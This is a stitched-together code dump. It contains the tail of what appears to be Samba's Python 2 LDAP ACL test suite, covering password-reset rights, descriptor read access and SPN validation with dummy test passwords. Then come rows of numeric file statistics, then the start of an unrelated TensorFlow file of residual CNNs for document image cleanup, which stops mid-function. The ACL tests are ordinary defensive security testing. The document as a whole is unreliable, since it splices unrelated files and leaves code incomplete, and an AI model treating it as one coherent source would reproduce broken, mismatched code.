unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS1\"".encode('utf-16-le')) + """
""")
#then someone else's
self.ldb_user2.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
delete: unicodePwd
unicodePwd:: """ + base64.b64encode("\"samba123@\"".encode('utf-16-le')) + """
add: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS2\"".encode('utf-16-le')) + """
""")
def test_reset_password1(self):
"""Try a user password reset operation (unicodePwd) before and after granting CAR"""
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS1\"".encode('utf-16-le')) + """
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
mod = "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS1\"".encode('utf-16-le')) + """
""")
def test_reset_password2(self):
"""Try a user password reset operation (userPassword) before and after granting CAR"""
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: userPassword
userPassword: thatsAcomplPASS1
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
mod = "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: userPassword
userPassword: thatsAcomplPASS1
""")
# This fails on Windows 2000 domain level with constraint violation
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
def test_reset_password3(self):
"""Grant WP and see what happens (unicodePwd)"""
mod = "(A;;WP;;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS1\"".encode('utf-16-le')) + """
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
def test_reset_password4(self):
"""Grant WP and see what happens (userPassword)"""
mod = "(A;;WP;;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: userPassword
userPassword: thatsAcomplPASS1
""")
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
else:
self.fail()
def test_reset_password5(self):
"""Explicitly deny WP but grant CAR (unicodePwd)"""
mod = "(D;;WP;;;PS)(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: unicodePwd
unicodePwd:: """ + base64.b64encode("\"thatsAcomplPASS1\"".encode('utf-16-le')) + """
""")
def test_reset_password6(self):
"""Explicitly deny WP but grant CAR (userPassword)"""
mod = "(D;;WP;;;PS)(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;PS)"
self.sd_utils.dacl_add_ace(self.get_user_dn(self.user_with_wp), mod)
try:
self.ldb_user.modify_ldif("""
dn: """ + self.get_user_dn(self.user_with_wp) + """
changetype: modify
replace: userPassword
userPassword: thatsAcomplPASS1
""")
# This fails on Windows 2000 domain level with constraint violation
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
class AclExtendedTests(AclTests):
def setUp(self):
super(AclExtendedTests, self).setUp()
#regular user, will be the creator
self.u1 = "ext_u1"
#regular user
self.u2 = "ext_u2"
#admin user
self.u3 = "ext_u3"
self.ldb_admin.newuser(self.u1, self.user_pass)
self.ldb_admin.newuser(self.u2, self.user_pass)
self.ldb_admin.newuser(self.u3, self.user_pass)
self.ldb_admin.add_remove_group_members("Domain Admins", self.u3,
add_members_operation=True)
self.ldb_user1 = self.get_ldb_connection(self.u1, self.user_pass)
self.ldb_user2 = self.get_ldb_connection(self.u2, self.user_pass)
self.ldb_user3 = self.get_ldb_connection(self.u3, self.user_pass)
self.user_sid1 = self.sd_utils.get_object_sid(self.get_user_dn(self.u1))
self.user_sid2 = self.sd_utils.get_object_sid(self.get_user_dn(self.u2))
def tearDown(self):
super(AclExtendedTests, self).tearDown()
delete_force(self.ldb_admin, self.get_user_dn(self.u1))
delete_force(self.ldb_admin, self.get_user_dn(self.u2))
delete_force(self.ldb_admin, self.get_user_dn(self.u3))
delete_force(self.ldb_admin, "CN=ext_group1,OU=ext_ou1," + self.base_dn)
delete_force(self.ldb_admin, "ou=ext_ou1," + self.base_dn)
def test_ntSecurityDescriptor(self):
#create empty ou
self.ldb_admin.create_ou("ou=ext_ou1," + self.base_dn)
#give u1 Create children access
mod = "(A;;CC;;;%s)" % str(self.user_sid1)
self.sd_utils.dacl_add_ace("OU=ext_ou1," + self.base_dn, mod)
mod = "(A;;LC;;;%s)" % str(self.user_sid2)
self.sd_utils.dacl_add_ace("OU=ext_ou1," + self.base_dn, mod)
#create a group under that, grant RP to u2
self.ldb_user1.newgroup("ext_group1", groupou="OU=ext_ou1", grouptype=4)
mod = "(A;;RP;;;%s)" % str(self.user_sid2)
self.sd_utils.dacl_add_ace("CN=ext_group1,OU=ext_ou1," + self.base_dn, mod)
#u2 must not read the descriptor
res = self.ldb_user2.search("CN=ext_group1,OU=ext_ou1," + self.base_dn,
SCOPE_BASE, None, ["nTSecurityDescriptor"])
self.assertNotEqual(len(res), 0)
self.assertFalse("nTSecurityDescriptor" in res[0].keys())
#grant RC to u2 - still no access
mod = "(A;;RC;;;%s)" % str(self.user_sid2)
self.sd_utils.dacl_add_ace("CN=ext_group1,OU=ext_ou1," + self.base_dn, mod)
res = self.ldb_user2.search("CN=ext_group1,OU=ext_ou1," + self.base_dn,
SCOPE_BASE, None, ["nTSecurityDescriptor"])
self.assertNotEqual(len(res), 0)
self.assertFalse("nTSecurityDescriptor" in res[0].keys())
#u3 is member of administrators group, should be able to read sd
res = self.ldb_user3.search("CN=ext_group1,OU=ext_ou1," + self.base_dn,
SCOPE_BASE, None, ["nTSecurityDescriptor"])
self.assertEqual(len(res),1)
self.assertTrue("nTSecurityDescriptor" in res[0].keys())
class AclSPNTests(AclTests):
def setUp(self):
super(AclSPNTests, self).setUp()
self.dcname = "TESTSRV8"
self.rodcname = "TESTRODC8"
self.computername = "testcomp8"
self.test_user = "spn_test_user8"
self.computerdn = "CN=%s,CN=computers,%s" % (self.computername, self.base_dn)
self.dc_dn = "CN=%s,OU=Domain Controllers,%s" % (self.dcname, self.base_dn)
self.site = "Default-First-Site-Name"
self.rodcctx = dc_join(server=host, creds=creds, lp=lp,
site=self.site, netbios_name=self.rodcname, targetdir=None,
domain=None)
self.dcctx = dc_join(server=host, creds=creds, lp=lp, site=self.site,
netbios_name=self.dcname, targetdir=None, domain=None)
self.ldb_admin.newuser(self.test_user, self.user_pass)
self.ldb_user1 = self.get_ldb_connection(self.test_user, self.user_pass)
self.user_sid1 = self.sd_utils.get_object_sid(self.get_user_dn(self.test_user))
self.create_computer(self.computername, self.dcctx.dnsdomain)
self.create_rodc(self.rodcctx)
self.create_dc(self.dcctx)
def tearDown(self):
super(AclSPNTests, self).tearDown()
self.rodcctx.cleanup_old_join()
self.dcctx.cleanup_old_join()
delete_force(self.ldb_admin, "cn=%s,cn=computers,%s" % (self.computername, self.base_dn))
delete_force(self.ldb_admin, self.get_user_dn(self.test_user))
def replace_spn(self, _ldb, dn, spn):
print "Setting spn %s on %s" % (spn, dn)
res = self.ldb_admin.search(dn, expression="(objectClass=*)",
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
if "servicePrincipalName" in res[0].keys():
flag = FLAG_MOD_REPLACE
else:
flag = FLAG_MOD_ADD
msg = Message()
msg.dn = Dn(self.ldb_admin, dn)
msg["servicePrincipalName"] = MessageElement(spn, flag,
"servicePrincipalName")
_ldb.modify(msg)
def create_computer(self, computername, domainname):
dn = "CN=%s,CN=computers,%s" % (computername, self.base_dn)
samaccountname = computername + "$"
dnshostname = "%s.%s" % (computername, domainname)
self.ldb_admin.add({
"dn": dn,
"objectclass": "computer",
"sAMAccountName": samaccountname,
"userAccountControl": str(samba.dsdb.UF_WORKSTATION_TRUST_ACCOUNT),
"dNSHostName": dnshostname})
# same as for join_RODC, but do not set any SPNs
def create_rodc(self, ctx):
ctx.krbtgt_dn = "CN=krbtgt_%s,CN=Users,%s" % (ctx.myname, ctx.base_dn)
ctx.never_reveal_sid = [ "<SID=%s-%s>" % (ctx.domsid, security.DOMAIN_RID_RODC_DENY),
"<SID=%s>" % security.SID_BUILTIN_ADMINISTRATORS,
"<SID=%s>" % security.SID_BUILTIN_SERVER_OPERATORS,
"<SID=%s>" % security.SID_BUILTIN_BACKUP_OPERATORS,
"<SID=%s>" % security.SID_BUILTIN_ACCOUNT_OPERATORS ]
ctx.reveal_sid = "<SID=%s-%s>" % (ctx.domsid, security.DOMAIN_RID_RODC_ALLOW)
mysid = ctx.get_mysid()
admin_dn = "<SID=%s>" % mysid
ctx.managedby = admin_dn
ctx.userAccountControl = (samba.dsdb.UF_WORKSTATION_TRUST_ACCOUNT |
samba.dsdb.UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION |
samba.dsdb.UF_PARTIAL_SECRETS_ACCOUNT)
ctx.connection_dn = "CN=RODC Connection (FRS),%s" % ctx.ntds_dn
ctx.secure_channel_type = misc.SEC_CHAN_RODC
ctx.RODC = True
ctx.replica_flags = (drsuapi.DRSUAPI_DRS_INIT_SYNC |
drsuapi.DRSUAPI_DRS_PER_SYNC |
drsuapi.DRSUAPI_DRS_GET_ANC |
drsuapi.DRSUAPI_DRS_NEVER_SYNCED |
drsuapi.DRSUAPI_DRS_SPECIAL_SECRET_PROCESSING)
ctx.join_add_objects()
def create_dc(self, ctx):
ctx.userAccountControl = samba.dsdb.UF_SERVER_TRUST_ACCOUNT | samba.dsdb.UF_TRUSTED_FOR_DELEGATION
ctx.secure_channel_type = misc.SEC_CHAN_BDC
ctx.replica_flags = (drsuapi.DRSUAPI_DRS_WRIT_REP |
drsuapi.DRSUAPI_DRS_INIT_SYNC |
drsuapi.DRSUAPI_DRS_PER_SYNC |
drsuapi.DRSUAPI_DRS_FULL_SYNC_IN_PROGRESS |
drsuapi.DRSUAPI_DRS_NEVER_SYNCED)
ctx.join_add_objects()
def dc_spn_test(self, ctx):
netbiosdomain = self.dcctx.get_domain_name()
try:
self.replace_spn(self.ldb_user1, ctx.acct_dn, "HOST/%s/%s" % (ctx.myname, netbiosdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
mod = "(OA;;SW;f3a64788-5306-11d1-a9c5-0000f80367c1;;%s)" % str(self.user_sid1)
self.sd_utils.dacl_add_ace(ctx.acct_dn, mod)
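# f3a64788-5306-11d1-a9c5-0000f80367c1 is the Validated-SPN validated write
# right; once granted, the server validates each servicePrincipalName value
# against the account's own names, accepting the well-formed SPNs below and
# rejecting the mismatched ones afterwards.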
self.replace_spn(self.ldb_user1, ctx.acct_dn, "HOST/%s/%s" % (ctx.myname, netbiosdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "HOST/%s" % (ctx.myname))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "HOST/%s.%s/%s" %
(ctx.myname, ctx.dnsdomain, netbiosdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "HOST/%s/%s" % (ctx.myname, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "HOST/%s.%s/%s" %
(ctx.myname, ctx.dnsdomain, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "GC/%s.%s/%s" %
(ctx.myname, ctx.dnsdomain, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s/%s" % (ctx.myname, netbiosdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s.%s/%s" %
(ctx.myname, ctx.dnsdomain, netbiosdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s" % (ctx.myname))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s/%s" % (ctx.myname, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s.%s/%s" %
(ctx.myname, ctx.dnsdomain, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "DNS/%s/%s" % (ctx.myname, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "RestrictedKrbHost/%s/%s" %
(ctx.myname, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "RestrictedKrbHost/%s" %
(ctx.myname))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/%s/%s" %
(ctx.myname, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "NtFrs-88f5d2bd-b646-11d2-a6d3-00c04fc9b232/%s/%s" %
(ctx.myname, ctx.dnsdomain))
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s._msdcs.%s" %
(ctx.ntds_guid, ctx.dnsdomain))
#the following spns do not match the restrictions and should fail
try:
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s.%s/ForestDnsZones.%s" %
(ctx.myname, ctx.dnsdomain, ctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, ctx.acct_dn, "ldap/%s.%s/DomainDnsZones.%s" %
(ctx.myname, ctx.dnsdomain, ctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, ctx.acct_dn, "nosuchservice/%s/%s" % ("abcd", "abcd"))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, ctx.acct_dn, "GC/%s.%s/%s" %
(ctx.myname, ctx.dnsdomain, netbiosdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, ctx.acct_dn, "E3514235-4B06-11D1-AB04-00C04FC2DCD2/%s/%s" %
(ctx.ntds_guid, ctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
def test_computer_spn(self):
# with WP, any value can be set
netbiosdomain = self.dcctx.get_domain_name()
self.replace_spn(self.ldb_admin, self.computerdn, "HOST/%s/%s" %
(self.computername, netbiosdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "HOST/%s" % (self.computername))
self.replace_spn(self.ldb_admin, self.computerdn, "HOST/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, netbiosdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "HOST/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "HOST/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "GC/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s/%s" % (self.computername, netbiosdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s.%s/ForestDnsZones.%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s.%s/DomainDnsZones.%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, netbiosdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s" % (self.computername))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "ldap/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "DNS/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "RestrictedKrbHost/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "RestrictedKrbHost/%s" %
(self.computername))
self.replace_spn(self.ldb_admin, self.computerdn, "Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "NtFrs-88f5d2bd-b646-11d2-a6d3-00c04fc9b232/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
self.replace_spn(self.ldb_admin, self.computerdn, "nosuchservice/%s/%s" % ("abcd", "abcd"))
#user has neither WP nor Validated-SPN, access denied expected
try:
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s/%s" % (self.computername, netbiosdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
mod = "(OA;;SW;f3a64788-5306-11d1-a9c5-0000f80367c1;;%s)" % str(self.user_sid1)
self.sd_utils.dacl_add_ace(self.computerdn, mod)
#grant Validated-SPN and check which values are accepted
#see 3.1.1.5.3.1.1.4 servicePrincipalName for reference
# for regular computer objects we should always get constraint violation
# This does not pass against Windows, although it should according to docs
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s" % (self.computername))
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s.%s" %
(self.computername, self.dcctx.dnsdomain))
try:
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s/%s" % (self.computername, netbiosdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, netbiosdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s/%s" %
(self.computername, self.dcctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, self.computerdn, "HOST/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, self.computerdn, "GC/%s.%s/%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, self.computerdn, "ldap/%s/%s" % (self.computername, netbiosdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
try:
self.replace_spn(self.ldb_user1, self.computerdn, "ldap/%s.%s/ForestDnsZones.%s" %
(self.computername, self.dcctx.dnsdomain, self.dcctx.dnsdomain))
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
def test_spn_rwdc(self):
self.dc_spn_test(self.dcctx)
def test_spn_rodc(self):
self.dc_spn_test(self.rodcctx)
# Unit test runner setup: run each ACL suite and track the overall exit status
ldb = SamDB(ldaphost, credentials=creds, session_info=system_session(lp), lp=lp)
runner = SubunitTestRunner()
rc = 0
if not runner.run(unittest.makeSuite(AclAddTests)).wasSuccessful():
rc = 1
if not runner.run(unittest.makeSuite(AclModifyTests)).wasSuccessful():
rc = 1
if not runner.run(unittest.makeSuite(AclDeleteTests)).wasSuccessful():
rc = 1
if not runner.run(unittest.makeSuite(AclRenameTests)).wasSuccessful():
rc = 1
# Get the old "dSHeuristics" if it was set
dsheuristics = ldb.get_dsheuristics()
# Set the "dSHeuristics" to activate the correct "userPassword" behaviour
ldb.set_dsheuristics("000000001")
# Get the old "minPwdAge"
minPwdAge = ldb.get_minPwdAge()
# Set it temporarily to "0"
ldb.set_minPwdAge("0")
if not runner.run(unittest.makeSuite(AclCARTests)).wasSuccessful():
rc = 1
if not runner.run(unittest.makeSuite(AclSearchTests)).wasSuccessful():
rc = 1
# Reset the "dSHeuristics" as they were before
ldb.set_dsheuristics(dsheuristics)
# Reset the "minPwdAge" as it was before
ldb.set_minPwdAge(minPwdAge)
if not runner.run(unittest.makeSuite(AclExtendedTests)).wasSuccessful():
rc = 1
if not runner.run(unittest.makeSuite(AclSPNTests)).wasSuccessful():
rc = 1
sys.exit(rc)
| 48.773118
| 160
| 0.636886
| 12,445
| 90,718
| 4.407151
| 0.054399
| 0.047095
| 0.044123
| 0.036265
| 0.825423
| 0.798494
| 0.776724
| 0.751053
| 0.739694
| 0.725546
| 0
| 0.024388
| 0.23206
| 90,718
| 1,859
| 161
| 48.799354
| 0.762897
| 0.071298
| 0
| 0.652375
| 0
| 0.001319
| 0.169881
| 0.071802
| 0
| 0
| 0
| 0
| 0.095646
| 0
| null | null | 0.065303
| 0.013852
| null | null | 0.008575
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
b14ab5109b8bb6569a3d79067ef8e3b7e5149690
| 11,624
|
py
|
Python
|
contrib/document_cleanup/light_weight_document_cleanup_ICDAR2021/model.py
|
Shreepadahs/computer_vision
|
9380789c5fe47069aa58b33b59fdb15ead528e84
|
[
"MIT"
] | 7,899
|
2019-12-14T20:39:16.000Z
|
2022-03-31T12:13:27.000Z
|
contrib/document_cleanup/light_weight_document_cleanup_ICDAR2021/model.py
|
Shreepadahs/computer_vision
|
9380789c5fe47069aa58b33b59fdb15ead528e84
|
[
"MIT"
] | 185
|
2019-07-30T15:33:48.000Z
|
2019-12-12T13:42:01.000Z
|
contrib/document_cleanup/light_weight_document_cleanup_ICDAR2021/model.py
|
Shreepadahs/computer_vision
|
9380789c5fe47069aa58b33b59fdb15ead528e84
|
[
"MIT"
] | 1,025
|
2019-12-18T06:30:48.000Z
|
2022-03-24T06:55:04.000Z
|
import tensorflow as tf
from tensorflow.keras import datasets, layers, models
from tensorflow.keras.models import Model, load_model
from tensorflow.keras.layers import Input, Add, Dense, Activation, ZeroPadding2D, BatchNormalization, Flatten, Conv2D, AveragePooling2D, MaxPooling2D, GlobalMaxPooling2D, Lambda
import os
import sys
def res_net_block(input_data, filters, conv_size):
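# Residual block: two Conv2D+BatchNormalization stages, an identity skip connection, then ReLU6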
x = layers.Conv2D(filters, conv_size, activation=tf.nn.relu6, padding='same',kernel_initializer = 'he_normal')(input_data)
x = layers.BatchNormalization()(x)
x = layers.Conv2D(filters, conv_size, activation=tf.nn.relu6, padding='same',kernel_initializer = 'he_normal')(x)
x = layers.BatchNormalization()(x)
x = layers.Add()([x, input_data])
x = layers.Activation(tf.nn.relu6)(x)
return x
def convert2gray(in_tensor):
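# Collapse the RGB input to single-channel luminance; the binary models predict a residual on top of this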
out = tf.image.rgb_to_grayscale(in_tensor)
return out
def CreateModel_M16_binary(input_shape = (None, None, 3),batch_size=None):
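# M16 binary variant: a 16-filter residual trunk whose 1-channel output is added to the grayscale input and passed through a sigmoid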
_strides=(1, 1)
# Define the input as a tensor with shape input_shape
X_input = Input(shape=input_shape,batch_size=batch_size)
gray_in = layers.Lambda(lambda x : convert2gray(x))(X_input)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(X_input)
out = layers.BatchNormalization()(out)
shortcut3 = out
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = layers.add([shortcut3, out])
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.Conv2D(1, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([gray_in, out])
out = tf.math.sigmoid(out)
# Create model
model = Model(inputs = X_input, outputs = out, name='M16Gray')
return model
def CreateModel_M16_color(input_shape = (None, None, 3),batch_size=None):
_strides=(1, 1)
# Define the input as a tensor with shape input_shape
X_input = Input(shape=input_shape,batch_size=batch_size)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(X_input)
out = layers.BatchNormalization()(out)
shortcut3 = out
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = res_net_block(out, 16, 3)
out = layers.add([shortcut3, out])
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.Conv2D(3, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([X_input, out])
out = tf.math.sigmoid(out)
# Create model
model = Model(inputs = X_input, outputs = out, name='M16Color')
return model
def CreateModel_M32_binary(input_shape = (None, None, 3),batch_size=None):
_strides=(1, 1)
# Define the input as a tensor with shape input_shape
X_input = Input(shape=input_shape,batch_size=batch_size)
gray_in = layers.Lambda(lambda x : convert2gray(x))(X_input)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(X_input)
out = layers.BatchNormalization()(out)
shortcut3 = out
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
shortcut2 = out
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = layers.add([shortcut2, out])
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([shortcut3, out])
out = layers.Conv2D(1, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([gray_in, out])
out = tf.math.sigmoid(out)
# Create model
model = Model(inputs = X_input, outputs = out, name='IlluNet')
return model
def CreateModel_M32_color(input_shape = (None, None, 3),batch_size=None):
_strides=(1, 1)
# Define the input as a tensor with shape input_shape
X_input = Input(shape=input_shape,batch_size=batch_size)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(X_input)
out = layers.BatchNormalization()(out)
shortcut3 = out
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
shortcut2 = out
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = res_net_block(out, 32, 3)
out = layers.add([shortcut2, out])
out = layers.Conv2D(32, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([shortcut3, out])
out = layers.Conv2D(3, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(out)
out = layers.BatchNormalization()(out)
out = layers.add([X_input, out])
out = tf.math.sigmoid(out)
# Create model
model = Model(inputs = X_input, outputs = out, name='IlluNet')
return model
def CreateModel_M64_binary(input_shape = (None, None, 3),batch_size=None):
_strides=(1, 1)
# Define the input as a tensor with shape input_shape
X_input = Input(shape=input_shape,batch_size=batch_size)
gray_in = layers.Lambda(lambda x : convert2gray(x))(X_input)
out = layers.Conv2D(16, kernel_size=(3, 3),activation=tf.nn.relu6, strides=_strides, padding='same',kernel_initializer = 'he_normal')(X_input)
out = layers.BatchNormalization()(out)
shortcut3 = out
